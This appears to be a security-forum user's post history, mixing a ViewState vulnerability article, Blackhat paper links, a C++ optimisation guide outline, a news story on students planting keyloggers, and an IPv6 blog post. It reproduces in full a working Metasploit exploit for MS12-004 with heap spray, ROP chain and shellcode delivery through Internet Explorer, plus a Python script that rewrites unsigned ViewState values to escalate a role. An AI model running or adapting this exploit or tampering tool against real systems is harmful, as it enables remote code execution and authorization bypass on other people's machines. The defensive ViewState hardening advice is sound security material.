Everything posted by Nytro
Profile: 18715 posts, 701 days won
-
I saw it, congratulations. PS: See also a few technical details: VUPEN Vulnerability Research Blog - Advanced Exploitation of Internet Explorer Heap Overflow Vulnerabilities (MS12-004 / CVE-2012-0003)
-
[h=3]VIEWSTATE Vulnerabilities[/h][h=2]Friday, January 27, 2012[/h]

1. ViewState Overview

"View state is a method that the ASP.NET page framework uses to preserve page and control values between round trips. When the HTML markup for the page is rendered, the current state of the page and values that must be retained during postback are serialized into base64-encoded strings. This information is then put into the view state hidden field or fields." (MSDN)

"What does ViewState do?
- Stores values per control by key name, like a Hashtable
- Tracks changes to a ViewState value's initial state
- Serializes and deserializes saved data into a hidden form field on the client
- Automatically restores ViewState data on postbacks"
(From an article on the ViewState mechanisms by an ASP.NET developer)

To put it even more simply, ViewState is a hidden HTML parameter that sends the current structure of the page content to the server. Example of use: retaining form field values on the page for page-by-page list scrolling.

Though there are widely used methods of disabling or avoiding ViewState (usually by means of a DBMS), this mechanism is built into ASP.NET by default and is often misused:

"Even more important than understanding what it does, is understanding what it does NOT do: What doesn't ViewState do?
- Automatically retain state of class variables (private, protected, or public)
- Remember any state information across page loads (only postbacks)
- Remove the need to repopulate data on every request
- ViewState is not responsible for the population of values that are posted such as by TextBox controls (although it does play an important role)"
(From an article on the ViewState mechanisms by an ASP.NET developer)

Obviously, such misuse entails more serious problems, such as missing filtering or a distorted idea of how the web application should work properly.

Developers tend to believe that if ViewState is a serialized structure, moreover a base64-"encrypted" one, no attacker will be able to get to its contents. However, the truth is, if the encryption and the data integrity check (MAC) are disabled, accessing the content is much simpler than it seems. Let's decode the base64:

Pic. 1. Decoding VIEWSTATE by means of base64_decoder.

Then open it in a hex editor. Now it is evident that any string variable is preceded by bytes that indicate the string's length (the number of bytes depends on the length of the string: a string shorter than 128 bytes will have a one-byte length field).

Pic. 2. Spoofing content of the serialized structure.

Authoritative resources state that ASP.NET versions earlier than 2.0 use LosFormatter as the serialization/deserialization algorithm, while version 2.0 and later use ObjectStateFormatter. Thus, to change a variable, one needs to determine the length of the new string, overwrite the string, overwrite the byte (or bytes) holding the string length, encode it back with base64 and insert it into __VIEWSTATE.

Pic. 3. Spoofing content of the serialized structure.

2. Vulnerabilities and attacks

Combined with the typically low level of knowledge of an average specialist about correct and secure configuration of web applications, such an approach generates the following vulnerabilities and provides opportunities for the following attacks:
• Cross-Site Scripting (XSS)
• Content Spoofing
• SQL Injection
• Information Leakage
• Logical Attacks
• ViewState Vulnerabilities as such
• Other vulnerabilities

2.1. Cross-Site Scripting, Content Spoofing

The possibility of content spoofing for an HTML page comes out of ViewState's main purpose, i.e. to preserve page and control values. If data from ViewState placed into the HTTP response body are not filtered properly, it results in Content Spoofing and/or Cross-Site Scripting.

Vulnerable configuration:
EnableViewStateMac=false
ViewStateEncryptionMode=never|auto (depends on RegisterRequiresViewStateEncryption)
ViewStateUserKey=EMPTY

2.2. Information Leakage, Logical Attacks

If the developer does not encrypt the VIEWSTATE parameter (Securing View State), an attacker can decode the VIEWSTATE structure and extract confidential data. If the developer does not check data integrity (MAC), an attacker can change parameters that influence the web application logic, thus facilitating Authentication Bypass, Authorization Bypass, and Abuse of Functionality.

Vulnerable configuration:
ViewStateEncryptionMode=never|auto
EnableViewStateMac=false|true

2.3. Attacks Against ViewState

The ViewState itself is also vulnerable to attacks. For example, September 2010 saw a publication describing a vulnerability that allowed decrypting AES-encrypted ViewState by sending numerous requests to a server and tracking various error codes (Important: ASP.NET Security Vulnerability - ScottGu's Blog). Besides, the earlier versions (1.0, 1.1) are vulnerable to Denial of Service (DoS) attacks (against unencrypted VIEWSTATE) and Replay attacks (against encrypted VIEWSTATE). The latter is an attack against a cryptographic protocol consisting in resending an intercepted package that will be accepted as valid, thus breaking the algorithm. These attacks were described by Michal Zalewski as far back as 2005 (Bugtraq: ASP.NET __VIEWSTATE crypto validation prone to replay attacks).

2.4. Other Vulnerabilities

All other vulnerabilities common to web applications, such as SQL injection, OS Commanding, as well as other vulnerabilities of the Code Exploitation, Information Disclosure, etc. types, can and should be checked both in variables of the ViewState structure and in ordinary variables sent by GET/POST/COOKIES.

Vulnerable configuration:
EnableViewStateMac=false
ViewStateEncryptionMode=never|auto (depends on RegisterRequiresViewStateEncryption)

3. Protection

3.1. EnableViewStateMac
Default: TRUE
Since: 1.0
Enables MAC (Machine Authentication Check) to verify the VIEWSTATE parameter values by means of a checksum. Set the EnableViewStateMac property to "True" in the Page element. Besides, the activation requires configuring the validationKey and validation properties of the machineKey element. The following built-in encrypting algorithms are supported: SHA1, MD5, 3DES, AES, HMACSHA256, HMACSHA384, HMACSHA512.

3.2. ViewStateEncryptionMode
Default: Auto
Since: 2.0
Allows encrypting the VIEWSTATE parameter with any of the following algorithms: DES, 3DES, AES. For activation, configure the decryptionKey and decryption properties of the machineKey element.

3.3. ViewStateUserKey
Default: EMPTY
Since: 1.1
Not everyone knows that ViewState protects not only itself against spoofing, but the entire application against CSRF, by means of the ViewStateUserKey parameter. ViewStateUserKey is just a protection mechanism; it is the developer's duty to ensure its unpredictable and random nature. Set the ViewStateUserKey property to a "String" in the Page element.

4. Conclusion

Sections 2 and 3 provide sound evidence that, configured by default, ViewState is secured against vulnerabilities that are not 0-day. However, quite often developers, after having struggled with constantly appearing error notifications about integrity violation, faulty arguments, etc., end up disabling the keys that provoke errors, thus leaving the application vulnerable to various attacks. Yet, if the web application is properly configured, the probability of errors and even vulnerabilities can be minimized down to 0.

Source: [Positive Technologies] Research Lab: VIEWSTATE Vulnerabilities
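The tampering procedure the article walks through by hand (decode the base64, find the length-prefixed string, overwrite it, fix the length byte or bytes, re-encode) as a worked example. This is an added example, not code from the Positive Technologies article or from Microsoft. It models the plaintext ObjectStateFormatter layout used by ASP.NET 2.0 and later: a 0xFF 0x01 header, a 0x05 token in front of each string, then the byte count as a 7-bit variable-length integer (one byte below 128, two bytes up to 16383), which is the behaviour the article observes in the hex editor. The sample __VIEWSTATE with the values "role" and "guest" is constructed here, not captured from a real application, and the helper names are this example's own. The tool only applies when EnableViewStateMac is false and the field is not encrypted; with the MAC on, the server rejects a patched blob with a validation error, which is itself a useful check during an assessment.

```python
import base64

# ObjectStateFormatter (ASP.NET 2.0+) stream layout used by this example.
MARKER_FORMAT = 0xFF     # first header byte
MARKER_VERSION = 0x01    # second header byte
TOKEN_PAIR = 0x0F        # Pair(first, second): two serialized items follow
TOKEN_STRING = 0x05      # 7-bit-encoded byte count, then UTF-8 bytes


def encode_7bit(n):
    """Variable-length integer as written by BinaryWriter.Write7BitEncodedInt:
    7 data bits per byte, high bit set on every byte except the last."""
    if n < 0:
        raise ValueError("length must be non-negative")
    out = bytearray()
    while True:
        low = n & 0x7F
        n >>= 7
        if n:
            out.append(low | 0x80)
        else:
            out.append(low)
            return bytes(out)


def decode_7bit(buf, pos):
    """Inverse of encode_7bit; returns (value, position after the varint)."""
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift > 28:
            raise ValueError("varint longer than 5 bytes")


def string_token(text):
    """TOKEN_STRING + length prefix + UTF-8 payload."""
    data = text.encode("utf-8")
    return bytes([TOKEN_STRING]) + encode_7bit(len(data)) + data


def read_string_at(raw, pos):
    """Parse a string token starting at raw[pos]; returns (text, end_pos)."""
    if raw[pos] != TOKEN_STRING:
        raise ValueError("no string token at offset %d" % pos)
    length, start = decode_7bit(raw, pos + 1)
    end = start + length
    if end > len(raw):
        raise ValueError("string length runs past end of stream")
    return raw[start:end].decode("utf-8"), end


def build_sample_viewstate(first, second):
    """Constructed, unsigned, unencrypted __VIEWSTATE: a Pair of two strings."""
    raw = bytes([MARKER_FORMAT, MARKER_VERSION, TOKEN_PAIR])
    raw += string_token(first) + string_token(second)
    return base64.b64encode(raw).decode("ascii")


def is_objectstateformatter(raw):
    """Plaintext ObjectStateFormatter output starts with 0xFF 0x01; an
    encrypted field (or a LosFormatter field from ASP.NET 1.x) does not."""
    return len(raw) >= 2 and raw[0] == MARKER_FORMAT and raw[1] == MARKER_VERSION


def strings_in_pair(viewstate_b64):
    """Decode the sample Pair layout back to its two strings."""
    raw = base64.b64decode(viewstate_b64)
    if not is_objectstateformatter(raw) or raw[2] != TOKEN_PAIR:
        raise ValueError("not the expected Pair-of-strings layout")
    first, pos = read_string_at(raw, 3)
    second, _ = read_string_at(raw, pos)
    return first, second


def replace_string(viewstate_b64, old, new):
    """Swap one string value, regenerating the length prefix so a value that
    crosses the 127-byte boundary gets a two-byte length instead of one."""
    raw = base64.b64decode(viewstate_b64)
    if not is_objectstateformatter(raw):
        raise ValueError("no ObjectStateFormatter header; field may be encrypted")
    needle = string_token(old)
    idx = raw.find(needle)
    if idx < 0:
        raise ValueError("string %r not present as a token" % old)
    patched = raw[:idx] + string_token(new) + raw[idx + len(needle):]
    return base64.b64encode(patched).decode("ascii")


if __name__ == "__main__":
    vs = build_sample_viewstate("role", "guest")
    print("original :", strings_in_pair(vs))
    print("tampered :", strings_in_pair(replace_string(vs, "guest", "admin")))
```

Submitting the output of replace_string as the __VIEWSTATE value of a postback tells you which of the article's three cases you are in: the changed value takes effect (no MAC, no encryption), the server answers with a MAC validation error (EnableViewStateMac is on), or the field never decoded in the first place because is_objectstateformatter fails (ViewStateEncryptionMode is in force).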
-
Intercepting GSM traffic
In short, a few ideas; a presentation from Blackhat Europe 2008.
Download: http://www.blackhat.com/presentations/bh-europe-08/Steve-DHulton/Whitepaper/bh-eu-08-steve-dhulton-WP.pdf
-
Biologger - A Biometric Keylogger
An interesting idea; a presentation from Blackhat Europe 2008.
Download: http://www.blackhat.com/presentations/bh-europe-08/Lewis/Whitepaper/bh-eu-08-lewis-WP.pdf
-
Optimizing software in C++
An optimization guide for Windows, Linux and Mac platforms
By Agner Fog. Copenhagen University College of Engineering.
Copyright © 2004 - 2011. Last updated 2011-06-08.

Contents
1 Introduction
1.1 The costs of optimizing
2 Choosing the optimal platform
2.1 Choice of hardware platform
2.2 Choice of microprocessor
2.3 Choice of operating system
2.4 Choice of programming language
2.5 Choice of compiler
2.6 Choice of function libraries
2.7 Choice of user interface framework
2.8 Overcoming the drawbacks of the C++ language
3 Finding the biggest time consumers
3.1 How much is a clock cycle?
3.2 Use a profiler to find hot spots
3.3 Program installation
3.4 Automatic updates
3.5 Program loading
3.6 Dynamic linking and position-independent code
3.7 File access
3.8 System database
3.9 Other databases
3.10 Graphics
3.11 Other system resources
3.12 Network access
3.13 Memory access
3.14 Context switches
3.15 Dependency chains
3.16 Execution unit throughput
4 Performance and usability
5 Choosing the optimal algorithm
6 Development process
7 The efficiency of different C++ constructs
7.1 Different kinds of variable storage
7.2 Integer variables and operators
7.3 Floating point variables and operators
7.4 Enums
7.5 Booleans
7.6 Pointers and references
7.7 Function pointers
7.8 Member pointers
7.9 Smart pointers
7.10 Arrays
7.11 Type conversions
7.12 Branches and switch statements
7.13 Loops
7.14 Functions
7.15 Function parameters
7.16 Function return types
7.17 Structures and classes
7.18 Class data members (properties)
7.19 Class member functions (methods)
7.20 Virtual member functions
7.21 Runtime type identification (RTTI)
7.22 Inheritance
7.23 Constructors and destructors
7.24 Unions
7.25 Bitfields
7.26 Overloaded functions
7.27 Overloaded operators
7.28 Templates
7.29 Threads
7.30 Exceptions and error handling
7.31 Other cases of stack unwinding
7.32 Preprocessing directives
7.33 Namespaces
8 Optimizations in the compiler
8.1 How compilers optimize
8.2 Comparison of different compilers
8.3 Obstacles to optimization by compiler
8.4 Obstacles to optimization by CPU
8.5 Compiler optimization options
8.6 Optimization directives
8.7 Checking what the compiler does
9 Optimizing memory access
9.1 Caching of code and data
9.2 Cache organization
9.3 Functions that are used together should be stored together
9.4 Variables that are used together should be stored together
9.5 Alignment of data
9.6 Dynamic memory allocation
9.7 Container classes
9.8 Strings
9.9 Access data sequentially
9.10 Cache contentions in large data structures
9.11 Explicit cache control
10 Multithreading
10.1 Hyperthreading
11 Out of order execution
12 Using vector operations
12.1 AVX instruction set and YMM registers
12.2 Automatic vectorization
12.3 Explicit vectorization
12.4 Mathematical functions for vectors
12.5 Aligning dynamically allocated memory
12.6 Aligning RGB video or 3-dimensional vectors
12.7 Conclusion
13 Making critical code in multiple versions for different CPUs
13.1 CPU dispatch strategies
13.2 Difficult cases
13.3 Test and maintenance
13.4 Implementation
13.5 CPU dispatching in Gnu compiler
13.6 CPU dispatching in Intel compiler
14 Specific optimization tips
14.1 Use lookup tables
14.2 Bounds checking
14.3 Use bitwise operators for checking multiple values at once
14.4 Integer multiplication
14.5 Integer division
14.6 Floating point division
14.7 Don't mix float and double
14.8 Conversions between floating point numbers and integers
14.9 Using integer operations for manipulating floating point variables
14.10 Mathematical functions
15 Metaprogramming
16 Testing speed
16.1 The pitfalls of unit-testing
16.2 Worst-case testing
17 Optimization in embedded systems
18 Overview of compiler options
19 Literature
20 Copyright notice

Download: http://www.agner.org/optimize/optimizing_cpp.pdf
-
MS12-004 midiOutPlayNextPolyEvent Heap Overflow
Authored by sinn3r, juan vazquez, Shane Garrett | Site metasploit.com
Posted Jan 28, 2012

This Metasploit module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player's ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation to be higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al" a byte. This can be used to corrupt an array (CImplAry) we set up, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for the IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info={})
		super(update_info(info,
			'Name'           => "MS12-004 midiOutPlayNextPolyEvent Heap Overflow",
			'Description'    => %q{
					This module exploits a heap overflow vulnerability in the Windows Multimedia
				Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files.
				Remote code execution can be achieved by using Windows Media Player's ActiveX control.
				Exploitation is done by supplying a specially crafted MIDI file with specific events,
				causing the offset calculation being higher than how much is available on the heap
				(0x400 allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al"
				a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser
				to confuse types from tagVARIANT objects, which leverages remote code execution under
				the context of the user.

				At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP
				(Data Execution Prevention).

				Note: Based on our testing, the vulnerability does not seem to trigger when the victim
				machine is operated via rdesktop.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Shane Garrett',  #Initial discovery (IBM X-Force)
					'juan vazquez',
					'sinn3r',
				],
			'References'     =>
				[
					[ 'MSB', 'MS12-004'],
					[ 'CVE', '2012-0003' ],
					[ 'OSVDB', '78210'],
					[ 'BID', '51292'],
					[ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ],
				],
			'Payload'        =>
				{
					'Space'    => 1024,
				},
			'DefaultOptions' =>
				{
					'EXITFUNC'             => "process",
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3', { 'Rop' => false, 'DispatchDst' => 0x0c0c0c0c } ],
					[ 'IE 7 on Windows XP SP3', { 'Rop' => false, 'DispatchDst' => 0x0c0c0c0c } ],
					[ 'IE 8 on Windows XP SP3',
						{
							# xchg ecx,esp
							# or byte ptr [eax],al
							# add byte ptr [edi+5Eh],bl
							# ret 8
							# From IMAGEHLP
							'Rop'         => true,
							'StackPivot'  => 0x76C9B4C2,
							'DispatchDst' => 0x0c0c1be4
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Jan 10 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)
	end

	def get_target(request)
		agent = request.headers['User-Agent']
		vprint_status("Request from: #{agent}")

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
			#Windows XP SP3 + IE 6.0
			return targets[1]
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
			#Windows XP SP3 + IE 7.0
			return targets[2]
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
			#Windows XP SP3 + IE 8.0 + JRE6
			return targets[3]
		else
			return nil
		end
	end

	def get_midi
		# MIDI Fileformat Reference:
		# http://www.sonicspot.com/guide/midifiles.html
		#
		# Event Types:
		# 0x08 = Note Off (when MIDI key is released)
		# 0x09 = Note On (when MIDI key is pressed)
		# 0x0A = Note aftertouch (pressure change on the pressed MIDI key)
		# 0x0B = Controller Event (MIDI channels state)
		# 0x0C = Program change (Which instrument/patch should be played on the MIDI channel)
		# 0x0D = Channel aftertouch (similar to Note Aftertouch; affects all keys pressed on the specific MIDI channel)
		# 0x0E = Pitch Bend (similar to a controller event; has 2 bytes to describe its value)
		# 0x0F = Meta Events (not sent or received over a midi port)
		#
		# Structure:
		# [Header Chunk][Track Chunk][Meta Event][Meta Event][SYSEX Event][Midi Channel Event]
		#
		# Problem:
		# Windows Media Player fails to manage Note On and Note Off Events

		# Track Chunk Data
		tc = "\x00\xFF\x03\x0D\x44\x72\x75\x6D"       # Meta Event - Sequence/Track Name
		tc << "\x73\x20\x20\x20\x28\x42\x42\x29\x00"
		tc << "\x00\xC9\x28"                          # Midi Channel Event - Program Change
		tc << "\x00\xB9\x07\x64"                      # Midi Channel Event - Controller
		tc << "\x00\xB9\x0A\x40"                      # Midi Channel Event - Controller
		tc << "\x00\xB9\x7B\x00"                      # Midi Channel Event - Controller
		tc << "\x00\xB9\x5B\x28"                      # Midi Channel Event - Controller
		tc << "\x00\xB9\x5D\x00"                      # Midi Channel Event - Controller
		tc << "\x85\x50\x99\x23\x7F"                  # Midi Channel Event - Note On
		# Corruption events
		tc << "\x00\x9F\xb2\x73"                      # Midi Channel Event - Note On
		# Ends Corruption events
		tc << "\x00\xFF\x2F\x00"                      # Meta Event - End Of Track

		m = ''
		# HEADERCHUNK Header
		m << "MThd"              # Header
		m << "\x00\x00\x00\x06"  # Chunk size
		m << "\x00\x00"          # Format Type
		m << "\x00\x01"          # Number of tracks
		m << "\x00\x60"          # Time division
		# TRACKCHUNK header
		m << "MTrk"              # Header
		m << [tc.length].pack('N')
		m << tc

		midi_name = "test_case.mid"

		return midi_name, m
	end

	def on_request_uri(cli, request)
		if request.uri =~ /\.mid$/i
			print_status("Sending midi file to #{cli.peerhost}:#{cli.peerport}...")
			# Content-Type corrected from the posted 'application/octet-strem'
			send_response(cli, @midi, {'Content-Type'=>'application/octet-stream'})
			return
		end

		#Set default target
		my_target = target

		#If user chooses automatic target, we choose one based on user agent
		if my_target.name =~ /Automatic/
			my_target = get_target(request)
			if my_target.nil?
				send_not_found(cli)
				print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent")
				return
			end
			vprint_status("Target selected: #{my_target.name}")
		end

		midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
		midi_uri << "/#{@m_name}"

		spray = build_spray(my_target)
		if datastore['OBFUSCATE']
			spray = ::Rex::Exploitation::JSObfu.new(spray)
			spray.obfuscate
		end

		trigger = build_trigger(my_target)
		trigger_fn = "trigger"
		if datastore['OBFUSCATE']
			trigger = ::Rex::Exploitation::JSObfu.new(trigger)
			trigger.obfuscate
			trigger_fn = find_trigger_fn(trigger.to_s)
		end

		html = %Q|
		<html>
		<head>
		<script language='javascript'>
		#{spray}
		</script>
		<script language='javascript'>
		#{trigger}
		</script>
		<script for=audio event=PlayStateChange(oldState,newState)>
		if (oldState == 3 && newState == 0) {
			#{trigger_fn}();
		}
		</script>
		</head>
		<body>
		<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
		<param name="fileName" value="#{midi_uri}">
		<param name="SendPlayStateChangeEvents" value="true">
		<param NAME="AutoStart" value="True">
		<param name="uiMode" value="mini">
		<param name="Volume" value="-300">
		</object>
		</body>
		</html>
		|

		html = html.gsub(/^\t\t/, '')

		print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

	def exploit
		@m_name, @midi = get_midi
		super
	end

	def build_spray(my_target)
		# Extract string based on target
		if my_target.name == 'IE 8 on Windows XP SP3'
			js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
		else
			js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
		end

		# Build shellcode based on Rop requirement
		if my_target['Rop']
			code = create_rop_chain(my_target)
			code << payload.encoded
			shellcode = Rex::Text.to_unescape(code)
		else
			code = payload.encoded
			shellcode = Rex::Text.to_unescape(code)
		end

		# 1. Create big block of nops
		# 2. Compose one block which is nops + shellcode
		# 3. Repeat the block
		# 4. Extract string from the big block
		# 5. Spray
		spray = <<-JS
		var heap_obj = new heapLib.ie(0x10000);
		var code = unescape("#{shellcode}");
		var nops = unescape("%u0c0c%u0c0c");
		while (nops.length < 0x1000) nops+= nops;
		var shellcode = nops.substring(0,0x800 - code.length) + code;
		while (shellcode.length < 0x40000) shellcode += shellcode;
		#{js_extract_str}
		heap_obj.gc();
		for (var i=0; i < 600; i++) {
			heap_obj.alloc(block);
		}
		JS

		spray = heaplib(spray, {:noobfu => true})

		return spray
	end

	# Build the JavaScript string for the attributes
	def build_element(element_name, my_target)
		dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V"))
		element = ''

		if my_target.name =~ /IE 8/
			max = 63    # Number of attributes for IE 8
			index = 1   # Where we want to confuse the type
		else
			max = 55    # Number of attributes for before IE 8
			index = 0   # Where we want to confuse the type
		end

		element << "var #{element_name} = document.createElement(\"select\")" + "\n"

		# Build attributes
		0.upto(max) do |i|
			obj = (i==index) ? "unescape(\"#{dst}\")" : "alert"
			element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n"
		end

		return element
	end

	# Feng Shui and triggering Steps:
	# 1. Run the garbage collector before allocations
	# 2. Defragment the heap and alloc CImplAry objects in one step (objects size are IE version dependent)
	# 3. Make holes
	# 4. Let windows media play the crafted midi file and corrupt the heap
	# 5. Force the using of the confused tagVARIANT.
	def build_trigger(my_target)
		if my_target.name == 'IE 8 on Windows XP SP3'
			# Redoing the feng shui if fails makes it reliable
			js_trigger = <<-JSTRIGGER
			function trigger(){
				var k = 999;
				while (k > 0) {
					if (typeof(clones[k].w1) == "string") {
					} else {
						clones[k].w1('come on!');
					}
					k = k - 2;
				}
				feng_shui();
				document.audio.Play();
			}
			JSTRIGGER
			select_element = build_element('selob', my_target)
		else
			js_trigger = <<-JSTRIGGER
			function trigger(){
				var k = 999;
				while (k > 0) {
					if (typeof(clones[k].w0) == "string") {
					} else {
						clones[k].w0('come on!');
					}
					k = k - 2;
				}
				feng_shui();
				document.audio.Play();
			}
			JSTRIGGER
			select_element = build_element('selob', my_target)
		end

		trigger = <<-JS
		var heap = new heapLib.ie();
		#{select_element}
		var clones=new Array(1000);
		function feng_shui() {
			heap.gc();
			var i = 0;
			while (i < 1000) {
				clones[i] = selob.cloneNode(true)
				i = i + 1;
			}
			var j = 0;
			while (j < 1000) {
				delete clones[j];
				CollectGarbage();
				j = j + 2;
			}
		}
		feng_shui();
		#{js_trigger}
		JS

		trigger = heaplib(trigger, {:noobfu => true})

		return trigger
	end

	def find_trigger_fn(trigger)
		fns = trigger.scan(/function ([a-zA-Z0-9_]+)\(\)/)
		if fns.nil? or fns.empty?
			return "trigger"
		else
			return fns.last.first
		end
		return "trigger"
	end

	def junk(n=1)
		tmp = []
		value = rand_text(4).unpack("L")[0].to_i
		n.times { tmp << value }
		return tmp
	end

	# ROP chain copied from ms11_050_mshtml_cobjectelement.rb (generated by mona)
	# Added a little of roping to adjust the stack pivoting for this case
	# Specific for IE8 XP SP3 case at this time
	def create_rop_chain(my_target)
		rop_gadgets =
			[
				0x7c347f98,              # RETN (ROP NOP) [msvcr71.dll]
				my_target['StackPivot'], # stackpivot
				junk,                    # padding
				0x7c376402,  # POP EBP # RETN [msvcr71.dll]
				0x7c376402,  # skip 4 bytes [msvcr71.dll]
				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
				0xfffff800,  # Value to negate, will become 0x00000800 (dwSize)
				0x7c351e05,  # NEG EAX # RETN [msvcr71.dll]
				0x7c354901,  # POP EBX # RETN [msvcr71.dll]
				0xffffffff,
				0x7c345255,  # INC EBX # FPATAN # RETN [msvcr71.dll]
				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
				0x7c344f87,  # POP EDX # RETN [msvcr71.dll]
				0xffffffc0,  # Value to negate, will become 0x00000040
				0x7c351eb1,  # NEG EDX # RETN [msvcr71.dll]
				0x7c34d201,  # POP ECX # RETN [msvcr71.dll]
				0x7c38b001,  # &Writable location [msvcr71.dll]
				0x7c34b8d7,  # POP EDI # RETN [msvcr71.dll]
				0x7c347f98,  # RETN (ROP NOP) [msvcr71.dll]
				0x7c364802,  # POP ESI # RETN [msvcr71.dll]
				0x7c3415a2,  # JMP [EAX] [msvcr71.dll]
				0x7c347f97,  # POP EAX # RETN [msvcr71.dll]
				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
				0x7c345c30,  # ptr to 'push esp # ret ' [msvcr71.dll]
			].flatten.pack('V*')

		return rop_gadgets
	end

end

Source: MS12-004 midiOutPlayNextPolyEvent Heap Overflow - Packet Storm
-
[h=2]Students busted for hacking computers, changing grades[/h]

By Iain Thomson in San Francisco

Three high school juniors have been arrested after they devised a sophisticated hacking scheme to up their grades and make money selling quiz answers to their classmates.

The students are accused of breaking into the janitor’s office of California's Palos Verdes High School and making a copy of the master key, giving them access to all the classrooms. They then attached keylogging hardware to the computers of four teachers, and harvested the passwords needed to access the central files of the school network.

They then used that access to change their grades slightly, nudging them up by increments so that all three got As. At the time they were caught, keyloggers were found on three other teachers’ systems, indicating the group was expanding its efforts.

"They were pretty smart," Palos Verdes Estates police Sgt. Steve Barber told the Daily Breeze. "They knew exactly what to do with the computers. The scores wouldn't go up a whole lot, but enough to change their grade. They didn't want to make it real apparent something was going on."

The three didn’t just confine themselves to computer hacking. They're also accused of using the master key to pilfer around 20 tests before they were given – they then worked out the answers and sold them to other students. This scam only came to light when another student heard of the offer and snitched to the school principal.

"They were very bright kids," said Principal Nick Stephany. "They were in AP and honors classes. Am I shocked? Yeah. Definitely by the extent of it. None of these kids had any real trouble before."

Two students have been expelled over the incident, and others are to be disciplined for receiving stolen goods. The school has also upgraded its security and has advised teachers to change their passwords.

Sursa: Students busted for hacking computers, changing grades • The Register
-
[h=2]IPv6 at home, Part 1: Overview, Teredo[/h]

[Edit 2010-02-25 - adding some forward links to the other parts of this series. Rewrote parts - no more mention of how slow Teredo is (it's not), and some updated comments to reflect the state of ipv6 in 2010]

This blog post is part of a series on ipv6. In this part, I provide an overview of ipv6 and look at Teredo, the technology built into Windows Vista/7; in part 2, I look at AYIYA tunnels through aiccu, using sixxs net as a tunnel broker. Part 2.5 is a collection of useful ipv6 tidbits, and part 3 gets back to the original plan: Exploring ipv6 connectivity options – in this case, the tunnel offered by gogonet.

NB: The tunnel described in part 3 is a lot easier to set up than Teredo. It was never my intent to advocate the use of Teredo as the prevalent way to connect a machine to IPv6. I started with it in this series precisely because I thought it would be the least comfortable option. In hindsight, I should probably have started with the easy button.

Part 4 describes Hurricane Electric 6in4 tunnels, and part 4.1 shows how to set one up on a Juniper ScreenOS device. [JunOS tunnels, as opposed to ScreenOS tunnels, are shaky at this point, they work in 10.3r1, but not in 10.2r3 or 10.4r1. I may describe them when this situation has settled down a bit]

For a corporate environment, I take a look at ipv6 renumbering. If you are planning to deploy ipv6 in your network, you need to think about this.

[h=2]Overview[/h]

I’ve been running IPv6 at home since January 2008. When I took the plunge, I did so mainly to learn about the technology in preparation of it being adopted in the field. Factors that made me finally take this step in January 2008, as opposed to pondering it since January 2001, were:

- The government mandate to deploy IPv6 in federal networks, while weak, will undoubtedly bring IPv6 adoption into some enterprises. When this happens, I want to be ready, and I want my team to be ready, so we can capitalize on our knowledge and can claim to have been running IPv6 since early 2008.
- We’re deploying Juniper SSG-5 firewalls at our techies’ homes, and these little boxes do now support IPv6 with the release of software version 6.0.0. I could have been running IPv6 using a software client, but that would have done little to prepare me for seeing it deployed in an environment I will actually encounter – namely, hardware firewalls and routers.
- Four of the Internet DNS root servers are now reachable through IPv6. For the first time ever, this would allow a connection between IPv6 hosts that relies purely on IPv6. This is less a technical concern than a measure of where we are with IPv6: The root servers were the last “you can’t DO IPv6 without IPv4 first” holdout, and that’s gone now. When the root servers, who are very conservative, move, it’s time for mere mortals to test the waters, too.

Since most folk won’t have IPv6-capable hardware firewalls at home, I will talk about host – specifically, PC – based solutions to connect to IPv6 sites to start out with.

All right, starting with: What is IPv6, and why do I care?

